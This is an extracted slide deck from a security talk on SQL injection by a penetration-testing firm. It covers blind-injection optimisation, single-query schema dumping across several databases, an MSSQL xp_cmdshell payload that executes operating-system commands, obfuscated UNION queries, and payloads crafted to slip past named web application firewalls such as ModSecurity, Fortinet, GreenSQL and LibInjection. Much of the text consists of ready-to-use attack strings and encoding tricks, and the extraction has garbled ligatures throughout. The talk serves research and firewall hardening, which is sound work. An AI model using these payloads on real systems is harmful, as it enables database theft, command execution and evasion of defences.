) UNION SELECT `This_Talk` AS ('New Optimization and Obfuscation Techniques)%00

Roberto Salgado
Co-founder of Websec Provide informa4on security solu4ons Pen-tes4ng, training and monitoring Creator of The SQL Injec4on KB Pythonista / Security Researcher

Contact
[email protected] hHp://www.websec.ca hHp://www.twiHer.com/@LightOS

Overview
Optimization Analysis of Blind SQLi methods Op4mized queries Obfuscation Fuzzers Bypassing rewalls Fun with encodings Leapfrog SQLi LFI XSS

Exploits of a mom
How to prevent SQL Injec4ons? hHp://www.bobby-tables.com

hHp://xkcd.com/327/

OPTIMIZATION

OPTIMIZATION Intro
Why do we care?

hHp://xkcd.com/85/

OPTIMIZATION Blind SQL Injections

Analysis of methods Bisec4on method Regex method Bitwise methods Binary to posi4on (Bin2Pos)

OPTIMIZATION Blind SQL Injections

Quick reminder We can only retrieve 1 character at a 4me We test if we have the correct character with True and False responses

Example SELECT * FROM users WHERE id=1 AND 1=1 SELECT * FROM users WHERE id=1 AND 1=2

OPTIMIZATION ASCII Table

Each ASCII character can be represented in 1 byte or 8 bits
Character Binary (base 2) Octal (base 8) Decimal (base 10) Hexadecimal (base 16) a 01100001 141 97 61

OPTIMIZATION ASCII Table

OPTIMIZATION ASCII Table

The 8th bit of the ASCII characters were interested in is always 0
Decimal 0 127 255 Hexadecimal 00 7F FF Binary 00000000 01111111 11111111

The range were interested in

Decimal 0 127 Hexadecimal 00 7F Binary 00000000 01111111

OPTIMIZATION Bisection Method

Binary search algorithm ASCII range 32 126 Split in half: (32 + 126) / 2 = 79 Is the value greater or lesser? Split result in half again and repeat

OPTIMIZATION Bisection Method

a = 97 decimal
97 between 79 and 126 97 between 79 and 103 97 between 79 and 91 97 between 91 and 103 97 between 91 and 97 97 between 91 and 95 97 between 95 and 97 True True False True True False True (32 + 126) / 2 = 79 (79 + 126) / 2 = 102.5 (79 + 103) / 2 = 91 (91 + 103) / 2 = 97 (91 + 97) / 2 = 95 (95 + 97) / 2 = 96 97 != 96 97 == 97

OPTIMIZATION Bisection Method

Binary Search Tree
1,2,3,4,5,6,7,8

1,2,3,4

5,6,7,8

1,2

3,4

5,6

7,8

OPTIMIZATION Bisection Method

Bisection method Pros: Logarithmic log2(N) Divide-and-conquer algorithm 6-7 RPC Cons: Same average case / worst case scenario

OPTIMIZATION Regex Method

Regex method - By Simone 'R00T_ATI' Quatrini and Marco 'white_sheep' Rondini
REGEXP '^[a-z]' REGEXP '^[a-n]' REGEXP '^[a-g]' REGEXP '^[h-n]' REGEXP '^[h-l]' True True False True False

OPTIMIZATION Regex Method

Regex method - By Simone 'R00T_ATI' Quatrini and Marco 'white_sheep' Rondini Pros: No need to convert to decimal Bisec4on method on REGEX Cons: Same amount of requests as bisec4on

OPTIMIZATION Bitwise Methods

Each ASCII character can be represented in 1 byte or 8 bits The MSB of the ASCII range of characters we're interested in is always 0 The amount of requests will always be 7

OPTIMIZATION Bitwise Methods

"Faster Blind MySQL Injection Using Bit Shifting" - By Jelmer de Hen a = 97 dec = 01100001
(97 >> 7) = 0 (97 >> 6) = 0 (97 >> 5) = 2 (97 >> 4) = 6 1 or 0 1 or 0 010 or 011 0110 or 0111 1 0 0 1

OPTIMIZATION Bitwise Methods

"Faster Blind MySQL Injection Using Bit Shifting" - By Jelmer de Hen Pros: The amount of requests is consistent Cons: Always uses 7 RPC Weird implementa4on No threading

OPTIMIZATION Bitwise Methods

"Faster Blind MySQL Injection Using Bit Shifting" My variation
01100001 01100001 01100001 01100001 01100001 01100001 01100001 01100001 >> 7 >> 6 >> 5 >> 4 >> 3 >> 2 >> 1 >> 0 00000000 00000001 00000011 00000110 00001100 00011000 00110000 01100001 0 1 3 6 12 24 48 97

OPTIMIZATION Bitwise Methods

"Faster Blind MySQL Injection Using Bit Shifting" My variation a = 97 dec = 01100001
substr(bin(97>>7),-1,1) substr(bin(97>>6),-1,1) substr(bin(97>>5),-1,1) substr(bin(97>>4),-1,1) 1 or 0 1 or 0 1 or 0 1 or 0 0 1 1 0

OPTIMIZATION Bitwise Methods

"Faster Blind MySQL Injection Using Bit Shifting" My variation Pros: The amount of requests is consistent Threading Cons: Always uses 7 RPC

OPTIMIZATION Bitwise Methods

"Bit ANDing" - By Ruben Ventura a = 97 dec = 01100001
97 & 1 97 & 2 97 & 4 97 & 8 00000001 00000010 00000100 00001000

OPTIMIZATION Bitwise Methods

"Bit ANDing" - By Ruben Ventura a = 97 dec = 01100001
97 & 1 97 & 2 97 & 4 97 & 8 00000001 00000010 00000100 00001000 1

OPTIMIZATION Bitwise Methods

"Bit ANDing" - By Ruben Ventura a = 97 dec = 01100001
97 & 1 97 & 2 97 & 4 97 & 8 00000001 00000010 00000100 00001000 1 0

OPTIMIZATION Bitwise Methods

"Bit ANDing" - By Ruben Ventura a = 97 dec = 01100001
97 & 1 97 & 2 97 & 4 97 & 8 00000001 00000010 00000100 00001000 1 0 0

OPTIMIZATION Bitwise Methods

"Bit ANDing" - By Ruben Ventura a = 97 dec = 01100001
97 & 1 97 & 2 97 & 4 97 & 8 00000001 00000010 00000100 00001000 1 0 0 0

OPTIMIZATION Bitwise Methods

"Bit ANDing" - By Ruben Ventura a = 97 dec = 01100001
97 & 1 97 & 2 97 & 4 97 & 8 00000001 00000010 00000100 00001000 1 0 0 0

OPTIMIZATION Bitwise Methods

"Bit ANDing" - By Ruben Ventura Pros: The amount of requests is consistent Threading Cons: Always uses 7 RPC

OPTIMIZATION Bin2Pos Method

Requires a set of possible characters (32 126 decimal) The closer the char is to the beginning of the set, the less amount of requests required We can arrange the set of characters by most common leHers

OPTIMIZATION Bin2Pos Method

Map the character to its posi4on in the set Convert this posi4on to binary Now we have reduced the characters we have to look for to 2 (0 and 1)

OPTIMIZATION Bin2Pos Method

Our set (without capitals)

abcdefghijklmnopqrstuvwxyz _0123456789,.<>/?;:\'"[{]}\|=+-) (*&^%$#@!`~ 0123456789ABCDEF BIN(1) = 1 BIN(94) = 1011110

A hex set

Largest set has 94 posi4ons

OPTIMIZATION Bin2Pos Method

IF((@a:=MID(BIN(POSITION(MID((SELECT password from users where id=2 LIMIT 1),1,1)IN (CHAR(48,49,50,51,52,53,54,55,56,57,65,66,67,68,69,7 0))),1,1))!=space(0),2-@a,0/0)

OPTIMIZATION Bin2Pos Method

LOWERCASE_SET = (a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z, 0,1,2,3,4,5,6,7,8,9,_,!,@,#,$,%,^,&,*,(,),-,+,=,\,,., \", ',~,`,\\,|, {,},[,],:,;, )

OPTIMIZATION Bin2Pos Method

C is 3rd posi4on in the set, which equals 11 in binary Our request starts with the rst on bit Therefore, the rst number will always be 1

OPTIMIZATION Bin2Pos Method

Retrieving 11 We know the rst digit is 1 No request required Is the second digit 1? True Is the third digit 1? False, there is no third digit Total requests required for C: 2

OPTIMIZATION Bin2Pos Method

Taking it a step further
The most common rst leHer in a word in order of frequency T, O, A, W, B, C, D, S, F, M, R, H, I, Y, E, G, L, N, O, U, J, K LeHers most likely to follow E in order of frequency R,S,N,D The most common digraphs on order of frequency TH, HE, AN, IN, ER, ON, RE, ED, ND, HA, AT, EN, ES, OF, NT, EA, TI, TO, IO, LE, IS, OU, AR, AS, DE, RT, VE The most common trigraphs in order of frequency THE, AND, THA, ENT, ION, TIO, FOR, NDE, HAS, NCE, TIS, OFT, MEN
hHp://scoHbryce.com/cryptograms/stats.htm

OPTIMIZATION Bin2Pos Method

Pros: Only 1-6 RPC No maHer the size of the set, RPC will always be less than bisec4on Cons: Requires 2 dierent parameter values

OPTIMIZATION Bin2Pos Method

Comparison of methods
350

35%
292 301

300

250 224

200

29% 47%
88 91 105 47 147

189

150

100

50

0 CHARACTER_SET Bin2Pos MD5('ABC123') Bisec4on Bitwise THE QUICK BROWN FOX JUMPS OVER THE LAZY DOG

OPTIMIZATION Method Comparison

DEMO

OPTIMIZING QUERIES

OPTIMIZING QUERIES Data Extraction

Retrieve all databases, tables and columns with just one query.

OPTIMIZING QUERIES MySQL By Ionut Maroiu SELECT (@) FROM (SELECT(@:=0x00),(SELECT (@) FROM (informa4on_schema.columns) WHERE (table_schema>=@) AND (@)IN (@:=CONCAT(@, 0x0a,' [ ',table_schema,' ] >',table_name,' > ',column_name))))x

OPTIMIZING QUERIES MySQL - Demo

Demo

OPTIMIZING QUERIES MSSQL By Daniel Kachakil

SELECT table_name + ', ' FROM informa4on_schema.tables FOR XML PATH('')

OPTIMIZING QUERIES Oracle

SELECT RTRIM(XMLAGG(XMLELEMENT(e, table_name || ',')).EXTRACT('//text()').EXTRACT('//text()') ,',') FROM all_tables

OPTIMIZING QUERIES PostgreSQL By Dmitriy Serebryannikov

SELECT array_to_json(array_agg(tables))::text FROM (SELECT schemaname, relname FROM pg_stat_user_tables) AS tables LIMIT 1

OPTIMIZING QUERIES MSSQL One query for RCE Check to see if xp_cmdshell is loaded If enabled, check if ac4ve Run the 'dir' command and store the results into TMP_DB

OPTIMIZING QUERIES MSSQL

' IF EXISTS (SELECT 1 FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME='TMP_DB') DROP TABLE TMP_DB DECLARE @a varchar(8000) IF EXISTS(SELECT * FROM dbo.sysobjects WHERE id = object_id (N'[dbo].[xp_cmdshell]') AND OBJECTPROPERTY (id, N'IsExtendedProc') = 1) BEGIN CREATE TABLE %23xp_cmdshell (name nvarchar(11), min int, max int, cong_value int, run_value int) INSERT %23xp_cmdshell EXEC master..sp_congure 'xp_cmdshell' IF EXISTS (SELECT * FROM %23xp_cmdshell WHERE cong_value=1)BEGIN CREATE TABLE %23Data (dir varchar(8000)) INSERT %23Data EXEC master..xp_cmdshell 'dir' SELECT @a='' SELECT @a=Replace(@a %2B'<br></font><font color="black">'%2Bdir,'<dir>','</font><font color="orange">') FROM %23Data WHERE dir>@a DROP TABLE %23Data END ELSE SELECT @a='xp_cmdshell not enabled' DROP TABLE %23xp_cmdshell END ELSE SELECT @a='xp_cmdshell not found' SELECT @a AS tbl INTO TMP_DB--

OPTIMIZING QUERIES MSSQL - Demo

Demo

OPTIMIZING QUERIES More Single Liners Tes4ng can become tedious Injec4ons can use single, double or no quota4ons at all 400+ parameters/module 3 separate tests for each varia4on:

OR 1=1 OR '1'='1 OR 1=1

OPTIMIZING QUERIES More Single Liners How about fusing them? - OR 1#"OR"'OR''='"="'OR''='

OPTIMIZING QUERIES More Single Liners How about fusing them? - OR 1#"OR"'OR''='"="'OR''=' No quota4ons

OPTIMIZING QUERIES More Single Liners How about fusing them? - OR 1#"OR"'OR''='"="'OR''=' No quota4ons Double quota4ons

OPTIMIZING QUERIES More Single Liners How about fusing them? - OR 1#"OR"'OR''='"="'OR''=' No quota4ons Double quota4ons Single quota4ons

OPTIMIZING QUERIES More Single Liners What about ANDing? - !=0--+"!="'!='

OPTIMIZING QUERIES More Single Liners What about ANDing? - !=0--+"!="'!=' No quota4ons

OPTIMIZING QUERIES More Single Liners What about ANDing? - !=0--+"!="'!=' No quota4ons Double quota4ons

OPTIMIZING QUERIES More Single Liners What about ANDing? - !=0--+"!="'!=' No quota4ons Double quota4ons Single quota4ons

OBFUSCATION

OBFUSCATION What is it?

hHp://wellington.pm.org/archive/200704/simple_obfu/images/obfusca4on_02.png

OBFUSCATION How to confuse an admin

UNION select@0o0oOOO0Oo0OOooOooOoO00Oooo0o0oOO $ fRom(SeLEct@0o0oOOO0Oo0OOooOooOoO00Oooo0o0oOO frOM`informa4on_schema`.`triggers`)0o0oOOO0Oo0OOooOooOoO00Oooo0o0oOO WHere !FAlSE||tRue&&FalSe||FalsE&&TrUE like TruE||FalSE union/*! 98765select@000OO0O0OooOoO0OOoooOOoOooo0o0o:=grOup_cONcaT(`username`)``from(users)whErE(username)like'admin'limi t 1*/select@000OO0O0OooOoO0OOoooO0oOooo0o0o limit 1,0 UnION SeleCt(selEct(sELecT/*! 67890sELect@000OO0O0O0oOoO0OOoooOOoOooo0o0o:=group_concat(`table_name`)FrOM informa4on_schema.sta4s4cs WhERE TABLe_SCHEmA In(database())*//*!@000OO0O0OooOoO0OOoooO0oOooo0o0o:=gROup_conCat(/*!taBLe_naME)*/fRoM informa4on_schema.par44ons where TABLe_SCHEma not in(concat((select insert(insert((select (colla4on_name)from(informa4on_schema.colla4ons)where(id)=true +true),true,oor(pi()),trim(version()from(@@version))),oor(pi()),ceil(pi()*pi()),space(0))), conv((125364/(true-!true))-42351, ceil(pi()*pi()),oor(pow(pi(),pi()))),mid(aes_decrypt(aes_encrypt(0x6175746F6D6174696F6E,0x4C696768744F53), 0x4C696768744F53)FROM oor(version()) FOR ceil(version())),rpad(reverse(lpad(colla4on(user()),ceil(pi())--@@log_bin,0x00)),! ! true,0x00),CHAR((ceil(pi())+!false)*ceil((pi()+ceil(pi()))*pi()),(ceil(pi()*pi())*ceil(pi()*pi()))--cos(pi()),(ceil(pi()*pi())*ceil(pi()*pi()))-- ceil(pi()),(ceil(pi()*pi())*ceil(pi()*pi()))-cos(pi()),(ceil(pi()*pi())*ceil(pi()*pi()))--oor(pi()*pi()),(ceil(pi()*pi())*ceil(pi()*pi()))-oor(pi()))), 0x6d7973716c))from(select--(select~0x7))0o0oOOO0Oo0OOooOooOoO00Oooo0o0oO)from(select@/*!/*!$*/from(select +3.``)000oOOO0Oo0OOooOooOoO00Oooo0o0oO)0o0oOOO0Oo0OOooOooOoO00Oooo0o0oO/*! 76799sElect@000OO0O0OooOoO00Oooo0OoOooo0o0o:=group_concat(`user`)``from`mysql.user`WHeRe(user)=0x726f6f74*/ #(SeLECT@ uNioN sElEcT AlL group_concat(cOLumN_nAME,1,1)FroM InFoRMaTioN_ScHemA.COLUMNS where taBle_scHema not in(0x696e666f726d6174696f6e5f736368656d61,0x6d7973716c)UNION SELECT@0o0oOOO0Oo0OOooOooOoO00Oooo0o0oOO UNION SELECT@0o0oOOO0Oo0OOooOooOoO00Oooo0o0oOO UNION SELECT@000OO0O0OooOoO0OOoooO0oOooo0o0oOO UNION SELECT@0o0oOOO0Oo0OOooOooOoO00Oooo0o0oOO)

BYPASSING FIREWALLS

BYPASSING FIREWALLS General Tips

Read documenta4on for unexpected behavior and oddi4es Learn what the DBMS is capable of and what it can handle Fuzzers can help nd undocumented oddi4es Be crea4ve!

OBFUSCATION Simple PHP Fuzzer

<?php $link = mysql_connect('localhost', 'root', ''); for($i=0; $i<=255; $i++) { $query = mysql_query("SELECT 1 FROM dual WHERE 1" . chr($i) . "=1"); if(!$query) { con4nue; } echo $i . ':0x' . dechex($i) . ':' . chr($i) . '<br>'; } ?>

OBFUSCATION Simple PHP Fuzzer

OBFUSCATION Simple Python Fuzzer

def main(): warnings.warn("deprecated", Depreca4onWarning) db = MySQLdb.connect(host="localhost", user="root", passwd="", db="test", port=1337) cursor = db.cursor() for a in range(256): try: cursor.execute("SELECT 1 FROM%susers WHERE 1=1 limit 1" % (chr(a))) print "a:%d:%s:%s" % (a, hex(a), chr(a) if a!=10 else "NEW LINE") except (MySQLdb.Error): cursor = db.cursor() conEnue

OBFUSCATION Allowed Whitespaces

SQLite3
- 0A, 0D, 0C, 09, 20

MySQL 5
- 09, 0A, 0B, 0C, 0D, A0, 20

MySQL 3
- 01, 02, 03, 04, 05, 06, 07, 08, 09, 0A, 0B, 0C, 0D, 0E, 0F, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 1A, 1B, 1C, 1D, 1E, 1F, 20, 7F, 80, 81, 88, 8D, 8F, 90, 98, 9D, A0

OBFUSCATION Allowed Whitespaces

PostgreSQL
- 0A, 0D, 0C, 09, 20

Oracle 11g
- 00, 0A, 0D, 0C, 09, 20

MSSQL
- 01, 02, 03, 04, 05, 06, 07, 08, 09, 0A, 0B, 0C, 0D, 0E, 0F, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 1A, 1B, 1C, 1D, 1E, 1F, 20

OBFUSCATION Allowed Whitespaces

SELECT*FROMusersWHERE1=1

OBFUSCATION Allowed Whitespaces

BYPASSING FIREWALLS MySQL Obfuscation

1.UNION SELECT 2 3.2UNION SELECT 2 1e0UNION SELECT 2 SELECT\N/0.e3UNION SELECT 2 1e1AND-0.0UNION SELECT 2 1/*!12345UNION/*!31337SELECT/*!table_name*/ {ts 1}UNION SELECT.`` 1.e.table_name SELECT $.`` 1.e.table_name SELECT{_ .``1.e.table_name} SELECT LightOS . ``1.e.table_name LightOS SELECT informa4on_schema 1337.e.tables 13.37e.table_name SELECT 1 from informa4on_schema 9.e.table_name

BYPASSING FIREWALLS MSSQL Obfuscation

.1UNION SELECT 2 1.UNION SELECT.2alias 1e0UNION SELECT 2 1e1AND-1=0.0UNION SELECT 2 SELECT 0xUNION SELECT 2 SELECT\UNION SELECT 2 \1UNION SELECT 2 SELECT 1FROM[table]WHERE\1=\1AND\1=\1 SELECT"table_name"FROM[informa4on_schema].[tables]

BYPASSING FIREWALLS Oracle Obfuscation

1FUNION SELECT 2 1DUNION SELECT 2 SELECT 0x7461626c655f6e616d65 FROM all_tab_tables SELECT CHR(116) || CHR(97) || CHR(98) FROM all_tab_tables SELECT%00table_name%00FROM%00all_tab_tables

BYPASSING FIREWALLS General Tips

Don't start with something obvious

- 1 UNION SELECT GROUP_CONCAT(TABLE_NAME) FROM INFORMATION_SCHEMA.TABLES

Instead, keep it simple!

- CASE WHEN BINARY TRUE THEN TRUE END IS NOT UNKNOWN HAVING TRUE FOR UPDATE

BYPASSING FIREWALLS - SQLi Obfuscation

Modsecurity
-2 div 1 union all #in #between comments #in #between comments select 0x00, 0x41 like/*!31337table_name*/,3 from informa4on_schema.tables limit 1

BYPASSING FIREWALLS - SQLi Obfuscation

Modsecurity
CASE WHEN BINARY TRUE THEN TRUE END IS UNKNOWN FOR UPDATE UNION SELECT MATTRESSES 1 MOD 0.2UNION%A0SELECT 1,current_user,3

BYPASSING FIREWALLS - SQLi Obfuscation

Fortinet
S%A0E%B1L%C2E%D3C%E4T%F6 1 U%FFNION SEL%FFECT 2

BYPASSING FIREWALLS - SQLi Obfuscation

GreenSQL
-1 UNION SELECT table_name FROM informa4on_schema.tables limit 1 1 AND 1=0 UNION SELECT table_name FROM informa4on_schema.tables limit 1 1 AND 1=0.e1 UNION SELECT table_name FROM informa4on_schema.tables limit 1 1 AND 1= binary 1 UNION SELECT table_name FROM informa4on_schema.tables limit 1 IF((SELECT mid(table_name,1,1) FROM informa4on_schema.tables limit 1) =C,1,2)

BYPASSING FIREWALLS - SQLi Obfuscation

GreenSQL

BYPASSING FIREWALLS - SQLi Obfuscation

LibInjection
-1 UNION SELECT table_name Websec FROM informa4on_schema.tables LIMIT 1 -1 UNION%0ASELECT table_name FROM informa4on_schema.tables LIMIT 1 -1fUNION SELECT column FROM table 1; DECLARE @test AS varchar(20); EXEC master.dbo.xp_cmdshell 'cmd' -[id] UNION SELECT table_name FROM informa4on_schema.tables LIMIT 1 {d 2} UNION SELECT table_name FROM informa4on_schema.tables LIMIT 1

BYPASSING FIREWALLS - SQLi Obfuscation

LibInjection
1 between 1 AND`id` having 0 union select table_name from informa4on_schema.tables 1 mod /*!1*/ union select table_name from informa4on_schema.tables-- true is not unknown for update union select table_name from informa4on_schema.tables test'-1/1/**/union(select table_name from informa4on_schema.tables limit 1,1) -1 union select @``"", table_name from informa4on_schema.tables -1 LOCK IN SHARE MODE UNION SELECT table_name from informa4on_schema.tables $.``.id and 0 union select table_name from informa4on_schema.tables -(select @) is unknown having 1 UNION select table_name from informa4on_schema.tables /*!911111*//*!0*/union select table_name x from informa4on_schema.tables limit 1 -1.for update union select table_name from informa4on_schema.tables limit 1 -0b01 union select table_name from informa4on_schema.tables limit 1 1<binary 1>2 union select table_name from informa4on_schema.tables limit 1 -1 procedure analyse(1gfsdgfds, sfg) union select table_name from informa4on_schema.tables limit 1

BYPASSING FIREWALLS Encodings

URL encode Double URL encode Unicode encode UTF-8 mul4-byte encode First Nibble Second Nibble Double Nibble Invalid Percent encode Invalid Hex encode

BYPASSING FIREWALLS Encodings URL Encode

URL Encoding is used to transform special characters, so they can be sent over HTTP Characters get transformed to their hexadecimal equivalent, prexed with a percent sign a = %61

BYPASSING FIREWALLS Encodings Double URL Encode

Double URL encode is the process of re-encoding percent sign a = %61 %61 = %2561

BYPASSING FIREWALLS Encodings URL Encode / Weak Firewall

Descrip4on of SQLMAP tamper script charencode used to URL encode the request:
Useful to bypass very weak web applica2on rewalls that do not url-decode the request before processing it through their ruleset

BYPASSING FIREWALLS Encodings URL Encode / Weak Firewall

Demo

BYPASSING FIREWALLS Encodings Unicode

Similar to URL encoding, however the hex character is prexed with u00 Supported by IIS a = %61 %61 = %u0061

BYPASSING FIREWALLS Encodings UTF-8 Multi-byte

The leading bits of the rst byte, up to the rst 0, represent the total number of following bytes to complete the sequence The following bits aer the rst 0 in the rst byte form part of character Each consecu4ve byte has 10 in the high-order posi4on, however these two bits are redundant

BYPASSING FIREWALLS Encodings UTF-8 Multi-byte

Bytes in Byte 1 sequence 1 2 3 4 5 6 0xxxxxxx 110xxxxx 1110xxxx

Byte 2 10xxxxxx 10xxxxxx

Byte 3 10xxxxxx 10xxxxxx 10xxxxxx 10xxxxxx

Byte 4 10xxxxxx 10xxxxxx 10xxxxxx

Byte 5 10xxxxxx 10xxxxxx

Byte 6 10xxxxxx

11110xxx 10xxxxxx 111110xx 10xxxxxx 1111110x 10xxxxxx

BYPASSING FIREWALLS Encodings UTF-8 Multi-byte

Byte Sequence 2 byte sequence 2 byte sequence 2 byte sequence 2 byte sequence 3 byte sequence Character a encoded %c1%a1 %c1%21 %c1%61 %c1%e1 %e0%81%a1 First two high order bits 10 00 01 11 10

BYPASSING FIREWALLS Encodings Nibble

A nibble is 4 bits One nibble represents a hex digit (2^4 = 16) Two nibbles or an octet, represent a hex character

BYPASSING FIREWALLS Encodings Nibble

Hex 0 1 2 3 4 5 6 7 8 9 A B C D E F Decimal 0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 Octal 0 1 2 3 4 5 6 7 10 11 12 13 14 15 16 17 Binary 0000 0001 0010 0011 0100 0101 0110 0111 1000 1001 1010 1011 1100 1101 1110 1111

BYPASSING FIREWALLS Encodings First Nibble

First 4 leading bits are URL encoded a = %61 6 = %36 %%361

BYPASSING FIREWALLS Encodings Second Nibble

Last 4 remaining bits are URL encoded a = %61 1 = %31 %6%31

BYPASSING FIREWALLS Encodings Double Nibble

Combina4on of rst nibble + second nibble encoding a = %61 6 = 36 1 = %31 %%36%31

BYPASSING FIREWALLS Encodings Invalid Percent

IIS removes the percent sign when not used with valid hex The WAF receives: %SE%LE%CT %1 %F%R%%%%%OM %TA%B%L%E% However, IIS reads it as: SELECT 1 FROM TABLE

BYPASSING FIREWALLS Encodings Invalid Hex

Create invalid hex that results in the same decimal value as valid hex a = %61 %61 = 6 * 16 + 1 = 97 %2 = 2 * 16 + 65 = 97 %2 is the same as %61

BYPASSING FIREWALLS Encodings Invalid Hex

Decimal 10 11 12 13 14 15 16 17 Valid Hex 0A 0B 0C 0D 0E 0F 10 11 Invalid Hex 0A 0B 0C 0D 0E 0F 0G 0H

LEAPFROG

LEAPFROG What is it? A tool designed to harden your rewall Finds bypasses for dierent web aHacks SQLi XSS LFI Content Filters Creates all its payloads dynamically Provides recommenda4ons on successful bypasses Generates a score based on successful bypasses

LEAPFROG WAF Acceptance Factor WAF Acceptance Factor is a score based on the amount of malicious requests detected

LEAPFROG Wife Acceptance Factor Wife Acceptance Factor borrowed from:

hHp://en.wikipedia.org/wiki/Wife_acceptance_factor

DEMO

THE END

THE END Contact Information

@LightOS [email protected] hHp://www.websec.ca

www.WEBSEC.ca